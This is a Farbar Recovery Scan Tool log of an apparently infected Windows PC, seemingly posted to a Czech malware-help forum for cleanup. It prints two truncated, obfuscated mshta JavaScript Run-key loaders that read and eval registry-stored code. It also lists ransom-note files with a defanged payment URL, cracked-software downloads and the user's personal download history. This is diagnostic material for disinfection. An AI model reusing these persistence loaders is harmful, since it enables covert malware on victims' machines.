(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(VIBRAND) C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp1EC1.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(forum.viry.cz) C:\Users\tomas\Desktop\FRSTLauncher (1).exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\WINDOWS\system32\DptfPolicyLpmServiceHelper.exe [114048 2013-10-18] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13662936 2013-10-24] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1368792 2013-11-13] (Realtek Semiconductor)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [782008 2015-08-26] (Avira Operations GmbH & Co. KG)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [590441228] => C:\ProgramData\mscivosu.exe [71680 2015-06-15] (dswteyurtetuitr)
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [icq] => C:\Users\tomas\AppData\Roaming\ICQM\icq.exe [35224072 2014-12-22] (ICQ)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2899136 2015-08-19] (Valve Corporation)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8358680 2015-06-01] (Piriform Ltd)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [**2b3f035b<*>] => mshta javascript:zg1hbnDOb4="L2O";A3I=new%20ActiveXObject("WScript.Shell");Qt4kkEUtE="BlCeVlLM";VoK8Z=A3I.RegRead("HKCU\\software\\cbc7e7017e\\d0830d66");ZkFmW9YZY="C7tm";eval(VoK8Z);t2s9Omdgih="lolaL (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [**0001d08f<*>] => mshta javascript:Dx98MFWqhu="aNim";KD89=new%20ActiveXObject("WScript.Shell");Ols2XZzHR="Cor";qnfN81=KD89.RegRead("HKCU\\software\\cbc7e7017e\\d0830d66");tFuOj0s7="yZBlnuKVv";eval(qnfN81);TW4W0HiwIS="Z (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [AZNworks] => C:\Users\tomas\AppData\Local\AZNworks\tmp1EC1.exe [137616 2015-09-08] (VIBRAND)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [YWPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\tomas\AppData\Local\AZNworks\AstHelper32.dll
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2015-09-06] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2015-01-25]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.163\SSScheduler.exe (McAfee, Inc.)
Startup: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML [2015-09-08] ()
Startup: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG [2015-09-08] ()
Startup: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT [2015-09-08] ()
InternetURL: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://6i3cb6owitcouepv.speralreaopio.com/62bQfN
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{EB1A1010-ABD0-434D-A917-19F0225ED54C}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2015-07-14] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2015-07-14] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2015-07-14] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2015-07-14] (Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-10-15] (Microsoft Corporation)
FireFox:
========
FF ProfilePath: C:\Users\tomas\AppData\Roaming\Mozilla\Firefox\Profiles\WUHW9Sv9.default
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-03-31] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-08-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-08-29] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-03-31] (Microsoft Corporation)
FF Extension: Avira Browser Safety - C:\Users\tomas\AppData\Roaming\Mozilla\Firefox\Profiles\WUHW9Sv9.default\Extensions\abs@avira.com [2014-12-22]
Chrome:
=======
CHR HomePage: Default -> hxxp://isearch.omiga-plus.com/?type=hp&ts=1419069686&from=obw&uid=TOSHIBAXMQ01ABD100_24DTP3DZTXX24DTP3DZT
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR Profile: C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-12-22]
CHR Extension: (Google Docs) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-12-22]
CHR Extension: (Google Drive) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-12-22]
CHR Extension: (YouTube) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-12-22]
CHR Extension: (Ingress G+ Ident) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\cemdjcbehkacgpiielmiakooedjkkphk [2014-12-22]
CHR Extension: (Google Search) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-12-22]
CHR Extension: (Tampermonkey) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2014-12-22]
CHR Extension: (Google Sheets) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-12-22]
CHR Extension: (Avira Browser Safety) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2014-12-22]
CHR Extension: (Google Docs Offline) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-05]
CHR Extension: (AdBlock) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-03-03]
CHR Extension: (Chrome Web Store Payments) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-12-22]
CHR Extension: (Battlefield Play4Free) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\oiokahphinmbmakkehgelkmpolmnbkdh [2015-06-10]
CHR Extension: (Gmail) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-12-22]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [887128 2015-07-27] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [461672 2015-08-26] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [461672 2015-08-26] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1213072 2015-08-26] (Avira Operations GmbH & Co. KG)
R2 BBDemon; C:\Program Files\Dassault Systemes\B20\win_b64\code\bin\CATSysDemon.exe [46592 2009-09-26] (Dassault Systemes) [File not signed]
R2 DptfParticipantProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [117704 2013-10-18] (Intel Corporation)
R2 DptfPolicyConfigTDPService; C:\Windows\system32\DptfPolicyConfigTDPService.exe [116680 2013-10-18] (Intel Corporation)
R2 DptfPolicyCriticalService; C:\Windows\system32\DptfPolicyCriticalService.exe [148160 2013-10-18] (Intel Corporation)
R2 DptfPolicyLpmService; C:\Windows\system32\DptfPolicyLpmService.exe [126952 2013-10-18] (Intel Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.163\McCHSvc.exe [289256 2015-07-31] (McAfee, Inc.)
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [966336 2014-12-04] (@ByELDI) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3880448 2013-11-13] (Qualcomm Atheros Communications, Inc.)
R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [70928 2013-12-12] (ASUS Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [137288 2015-07-27] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [148632 2015-07-27] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [28600 2014-11-24] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [43576 2015-03-12] (Avira Operations GmbH & Co. KG)
R3 BthLEEnum; C:\Windows\system32\DRIVERS\BthLEEnum.sys [226304 2014-03-18] (Microsoft Corporation)
R3 DptfDevDram; C:\Windows\system32\DRIVERS\DptfDevDram.sys [145640 2013-10-18] (Intel Corporation)
R3 DptfDevPch; C:\Windows\system32\DRIVERS\DptfDevPch.sys [116752 2013-10-18] (Intel Corporation)
R3 DptfDevProc; C:\Windows\system32\DRIVERS\DptfDevProc.sys [289744 2013-10-18] (Intel Corporation)
R3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [494296 2013-10-18] (Intel Corporation)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-06] ( )
S3 LUMDriver; C:\WINDOWS\system32\drivers\LUMDriver.sys [24848 2008-01-02] (IBM)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-10-23] (Intel Corporation)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [827096 2015-03-12] (Realsil Semiconductor Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
S3 fdrawcmd; \??\C:\WINDOWS\system32\drivers\fdrawcmd.sys [X]
S3 xhunter1; \??\C:\WINDOWS\xhunter1.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-09-08 19:21 - 2015-09-08 19:22 - 00017939 _____ C:\Users\tomas\Desktop\FRST.txt
2015-09-08 19:19 - 2015-09-08 19:19 - 00112640 _____ (forum.viry.cz) C:\Users\tomas\Desktop\FRSTLauncher (1).exe
2015-09-08 19:18 - 2015-09-08 19:18 - 00112640 _____ (forum.viry.cz) C:\Users\tomas\Downloads\Nepotvrzeno 29148.crdownload
2015-09-08 19:17 - 2015-09-08 19:21 - 00000000 ____D C:\FRST
2015-09-08 19:15 - 2015-09-08 19:15 - 02190336 _____ (Farbar) C:\Users\tomas\Desktop\FRST64.exe
2015-09-08 19:08 - 2015-09-08 19:08 - 00000000 ____D C:\Program Files (x86)\ESET
2015-09-08 19:06 - 2015-09-08 19:06 - 02870984 _____ (ESET) C:\Users\tomas\Downloads\esetsmartinstaller_enu.exe
2015-09-08 19:04 - 2015-09-08 19:04 - 00008628 _____ C:\Users\tomas\HELP_DECRYPT.HTML
2015-09-08 19:04 - 2015-09-08 19:04 - 00008628 _____ C:\Users\tomas\Downloads\HELP_DECRYPT.HTML
2015-09-08 19:04 - 2015-09-08 19:04 - 00008628 _____ C:\Users\tomas\Desktop\HELP_DECRYPT.HTML
2015-09-08 19:04 - 2015-09-08 19:04 - 00004254 _____ C:\Users\tomas\HELP_DECRYPT.TXT
2015-09-08 19:04 - 2015-09-08 19:04 - 00004254 _____ C:\Users\tomas\Downloads\HELP_DECRYPT.TXT
2015-09-08 19:04 - 2015-09-08 19:04 - 00004254 _____ C:\Users\tomas\Desktop\HELP_DECRYPT.TXT
2015-09-08 19:04 - 2015-09-08 19:04 - 00000292 _____ C:\Users\tomas\HELP_DECRYPT.URL
2015-09-08 19:04 - 2015-09-08 19:04 - 00000292 _____ C:\Users\tomas\Downloads\HELP_DECRYPT.URL
2015-09-08 19:04 - 2015-09-08 19:04 - 00000292 _____ C:\Users\tomas\Desktop\HELP_DECRYPT.URL
2015-09-08 19:01 - 2015-09-08 19:01 - 00008628 _____ C:\Users\tomas\Documents\HELP_DECRYPT.HTML
2015-09-08 19:01 - 2015-09-08 19:01 - 00004254 _____ C:\Users\tomas\Documents\HELP_DECRYPT.TXT
2015-09-08 19:01 - 2015-09-08 19:01 - 00000292 _____ C:\Users\tomas\Documents\HELP_DECRYPT.URL
2015-09-08 18:57 - 2015-09-08 18:57 - 00008628 _____ C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.HTML
2015-09-08 18:57 - 2015-09-08 18:57 - 00008628 _____ C:\Users\tomas\AppData\HELP_DECRYPT.HTML
2015-09-08 18:57 - 2015-09-08 18:57 - 00004254 _____ C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.TXT
2015-09-08 18:57 - 2015-09-08 18:57 - 00004254 _____ C:\Users\tomas\AppData\HELP_DECRYPT.TXT
2015-09-08 18:57 - 2015-09-08 18:57 - 00000292 _____ C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.URL
2015-09-08 18:57 - 2015-09-08 18:57 - 00000292 _____ C:\Users\tomas\AppData\HELP_DECRYPT.URL
2015-09-08 18:53 - 2015-09-08 18:53 - 00008628 _____ C:\Users\tomas\AppData\Local\HELP_DECRYPT.HTML
2015-09-08 18:53 - 2015-09-08 18:53 - 00004254 _____ C:\Users\tomas\AppData\Local\HELP_DECRYPT.TXT
2015-09-08 18:53 - 2015-09-08 18:53 - 00000292 _____ C:\Users\tomas\AppData\Local\HELP_DECRYPT.URL
2015-09-08 18:41 - 2015-09-08 18:42 - 00000000 ____D C:\Users\tomas\AppData\Local\AZNworks
2015-09-07 21:01 - 2015-09-07 21:06 - 489167296 _____ C:\Users\tomas\Downloads\The.Fappening.zip
2015-09-06 21:28 - 2015-09-06 21:28 - 00048097 _____ C:\Users\tomas\Downloads\20547-courtney-stodden-vypadly-dudy-na-plazi-a-neni-to-pekne.htm
2015-09-06 21:17 - 2015-09-06 21:17 - 00048136 _____ C:\Users\tomas\Downloads\20856-herecka-amanda-seyfried-nam-zase-ukazuje-prsa-a-je-to-fajn.htm
2015-09-06 16:43 - 2015-09-06 16:49 - 00000000 ____D C:\Program Files (x86)\EMBIRD32
2015-09-06 16:41 - 2015-09-06 16:41 - 00003088 _____ C:\WINDOWS\System32\Tasks\{78AC1ACC-0F14-48C3-8F00-757EDF035A96}
2015-09-06 16:38 - 2015-09-06 16:41 - 122506240 _____ C:\Users\tomas\Downloads\embrd2k10b88daio.exe
2015-09-06 16:34 - 2015-09-06 16:34 - 21437440 _____ C:\Users\tomas\Downloads\embrd2k10b88d (1).exe
2015-09-06 16:31 - 2015-09-08 18:41 - 00000000 ____D C:\Users\tomas\AppData\Roaming\WinKun
2015-09-06 16:28 - 2015-09-06 16:55 - 00000232 _____ C:\WINDOWS\setupact.log
2015-09-06 16:28 - 2015-09-06 16:28 - 00000000 _____ C:\WINDOWS\setuperr.log
2015-09-06 16:12 - 2015-09-08 18:53 - 00000000 ____D C:\Users\tomas\AppData\Roaming\EMBIRD32
2015-09-06 16:12 - 2015-09-06 16:12 - 00000000 ____D C:\WINDOWS\system32\appmgmt
2015-09-06 16:11 - 2015-09-06 16:11 - 17931264 _____ C:\Users\tomas\Downloads\embrd2k10b87.exe
2015-09-06 16:08 - 1994-04-19 12:00 - 00000120 _____ C:\WINDOWS\WINRESAZ.INI
2015-09-06 16:08 - 1994-04-19 12:00 - 00000044 _____ C:\WINDOWS\WINKOLES.TXT
2015-09-06 16:05 - 2015-09-06 16:06 - 21437440 _____ C:\Users\tomas\Downloads\embrd2k10b88d.exe
2015-09-06 15:57 - 2015-09-08 18:57 - 00017871 _____ C:\WINDOWS\WindowsUpdate.log
2015-09-06 15:36 - 2015-09-06 15:36 - 00225388 _____ C:\Users\tomas\Downloads\[free-torrents.org]353113_Portable_Launcher.vbs
2015-09-06 15:31 - 2015-09-06 15:31 - 00000000 ____D C:\Users\tomas\AppData\Local\GHISLER
2015-09-06 15:31 - 2013-04-28 16:15 - 00001006 _____ C:\password.klc
2015-09-06 15:30 - 2015-09-06 15:30 - 00000216 _____ C:\Users\tomas\password.klc
2015-09-06 15:29 - 2015-09-06 15:29 - 00000654 _____ C:\Users\tomas\Desktop\Total Commander 64 bit.lnk
2015-09-06 15:29 - 2015-09-06 15:29 - 00000000 ____D C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Total Commander
2015-09-06 15:29 - 2015-09-06 15:29 - 00000000 ____D C:\Users\tomas\AppData\Roaming\GHISLER
2015-09-06 15:29 - 2015-09-06 15:29 - 00000000 ____D C:\totalcmd
2015-09-06 15:28 - 2015-09-06 15:28 - 04467064 _____ (Ghisler Software GmbH) C:\Users\tomas\Downloads\tcmd852x64.exe
2015-09-06 15:26 - 2004-06-13 14:00 - 00000165 _____ C:\WINDOWS\WINRSEAZ.INI
2015-09-06 15:26 - 2004-06-13 14:00 - 00000137 _____ C:\WINDOWS\WINKLOES.TXT
2015-09-06 15:22 - 2015-09-06 15:23 - 65225616 _____ C:\Users\tomas\Downloads\embrd2k12b95_x64_setup.exe
2015-09-06 15:20 - 2015-09-06 15:20 - 02234524 _____ C:\Users\tomas\Downloads\Embird+2013+crack.ace
2015-09-06 15:19 - 2015-09-06 15:21 - 91942120 _____ C:\Users\tomas\Downloads\embrd2k15b1014_x64_setup.exe
2015-09-06 15:16 - 2015-09-06 15:16 - 00696656 _____ C:\Users\tomas\Downloads\Embird%2B2003%2BBuild%2B5%2BCrack%2BDownloader__3687_i1629569851_il3681408.rar
2015-09-06 15:13 - 2015-09-06 15:13 - 02234524 _____ C:\Users\tomas\Downloads\65868315+studio.zip.ace
2015-09-06 15:11 - 2015-09-06 15:12 - 00000000 ____D C:\Users\tomas\Downloads\Embird
2015-09-06 15:11 - 2015-09-06 15:11 - 00033708 _____ C:\Users\tomas\Downloads\Embird (1).torrent
2015-09-06 15:10 - 2015-09-06 15:10 - 00033708 _____ C:\Users\tomas\Downloads\Embird.torrent
2015-09-05 10:29 - 2015-09-05 10:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2015-09-05 10:29 - 2015-09-05 10:29 - 00000000 ____D C:\Program Files\McAfee Security Scan
2015-09-02 19:48 - 2015-09-02 19:48 - 00034723 _____ C:\Users\tomas\Downloads\noblesni.htm
2015-08-26 22:01 - 2015-09-08 18:57 - 00000000 ____D C:\Users\tomas\AppData\Roaming\Skype
2015-08-26 22:01 - 2015-09-08 18:53 - 00000000 ____D C:\Users\tomas\AppData\Local\Skype
2015-08-26 22:01 - 2015-09-06 16:12 - 00000000 ____D C:\ProgramData\Skype
2015-08-26 22:00 - 2015-01-06 05:01 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndproxy.sys
2015-08-26 22:00 - 2015-01-06 04:59 - 00080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wanarp.sys
2015-08-26 22:00 - 2015-01-06 03:12 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascfg.dll
2015-08-26 22:00 - 2015-01-06 03:02 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rascfg.dll
2015-08-26 21:58 - 2015-07-22 16:19 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcResources.dll
2015-08-26 21:58 - 2015-07-22 15:52 - 01633792 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2015-08-26 21:58 - 2015-07-17 16:15 - 00951296 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2015-08-26 21:58 - 2015-07-17 16:10 - 00749568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2015-08-26 21:58 - 2015-07-14 05:27 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzsync.exe
2015-08-26 21:58 - 2015-07-13 21:10 - 00411455 _____ C:\WINDOWS\system32\ApnDatabase.xml
2015-08-26 21:58 - 2015-07-09 18:14 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2015-08-26 21:58 - 2015-07-03 23:51 - 01380056 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2015-08-26 21:58 - 2015-07-03 16:00 - 01097216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2015-08-26 21:58 - 2015-06-27 13:47 - 00118616 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
2015-08-26 21:58 - 2015-06-19 19:07 - 02819072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers.dll
2015-08-26 21:58 - 2015-05-01 03:13 - 06521800 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2015-08-26 21:58 - 2015-05-01 03:13 - 01488000 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2015-08-26 21:58 - 2015-05-01 03:13 - 00261376 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2015-08-26 21:57 - 2015-07-10 21:06 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthpan.sys
2015-08-26 21:57 - 2015-06-10 00:39 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2015-08-26 21:57 - 2015-06-10 00:39 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2015-08-26 21:57 - 2015-06-10 00:38 - 01201664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2015-08-26 21:42 - 2014-04-16 01:35 - 00028352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aspnet_counters.dll
2015-08-26 21:42 - 2014-04-16 01:34 - 00029888 _____ (Microsoft Corporation) C:\WINDOWS\system32\aspnet_counters.dll
2015-08-26 21:31 - 2015-08-26 21:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-08-22 12:37 - 2015-08-22 12:46 - 407010384 _____ (Microsoft Corporation) C:\Users\tomas\Downloads\X12-30196.exe
2015-08-20 18:16 - 2015-08-11 03:20 - 25191936 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-08-20 18:16 - 2015-08-11 02:20 - 19871232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-08-18 20:02 - 2015-08-18 20:02 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\tomas\Downloads\SpyHunter-Installer.exe
2015-08-18 19:00 - 2015-08-18 19:00 - 06326224 _____ C:\Users\tomas\Downloads\KMSPico 10.0.8.exe (1).zip
2015-08-18 18:27 - 2015-08-18 18:27 - 06326224 _____ C:\Users\tomas\Downloads\KMSPico 10.0.8.exe.zip
2015-08-14 15:57 - 2015-08-14 15:57 - 00000222 _____ C:\Users\tomas\Desktop\Path of Exile.url
2015-08-14 15:02 - 2015-07-30 16:04 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2015-08-14 15:02 - 2015-07-30 15:48 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
